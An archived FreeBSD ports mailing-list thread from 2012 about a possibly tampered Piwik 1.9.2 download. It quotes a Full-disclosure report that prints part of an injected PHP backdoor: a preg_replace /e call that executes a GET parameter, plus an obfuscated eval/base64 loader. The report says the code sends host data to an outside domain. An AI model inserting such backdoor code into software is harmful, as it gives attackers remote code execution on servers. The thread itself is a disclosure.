Date: Tue, 27 Nov 2012 14:19:05 +0100 From: "Hans Fr. Nordhaug" <hans@nordhaug.priv.no> To: Ruslan Mahmatkhanov <cvs-src@yandex.ru> Cc: FreeBSD Ports Mailing List <ports@freebsd.org>, ports-secteam@freebsd.org Subject: Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive Message-ID: <20121127131905.GA3839@hiMolde.no> In-Reply-To: <50B4B6E9.9020605@yandex.ru> References: <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru>
next in thread | previous in thread | raw e-mail | index | archive | help
Hi, I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/ before I got this message. I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz and compared it to my local copy of 1.9.2, and all files are unchanged. It's just the archiving that changed the file size. The Piwik build manager is a little bit sloppy ... Regards, Hans * Ruslan Mahmatkhanov <cvs-src@yandex.ru> [2012-11-27]: > => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/. > => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz > fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: > expected 5676196, actual 5676058 > > > > -------- Original message -------- > Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download > archive > Date: Mon, 26 Nov 2012 21:17:57 +0100 > From: Maximilian Grobecker <max@grobecker-wtal.de> > To: full-disclosure@lists.grok.org.uk > > Hi, > > this evening I downloaded a fresh archive of Piwik 1.9.2 and found this > code at the bottom of the /piwik/core/Loader.php file: > > (Just a short snippet) > -----------snip------------- > <?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) { > preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit; > } > if (file_exists(dirname(__FILE__)."/lic.log")) exit; > eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s > > [.......] > > -----------/snip------------- > > > I decoded some parts of this code and found what it does: > It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and > the request URI via POST to http://prostoivse.com/x.php and creates a > file named "lic.log" in the same directory. > As long as this file exists it seems that no further POST requests are made. > > At the moment I'm trying to figure out the further sense of this code, > but it seems that there might also be some kind of backdoor (because of > the use of $_GET). > > The file in the downloadable archive is dated at > Nov 26, 2012 / 18:42 UTC. > > From forums I know that some people downloaded the archive earlier this > day and don't have this code inside their files. > > At the moment (at 8:08 PM UTC) the archive is downloadable at the > original Piwik web site with this obfuscated code. > > I contacted the developers and managers of Piwik a few minutes ago about > this. > > > -- > Greetings from Wuppertal, Germany > > Max Grobecker
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20121127131905.GA3839>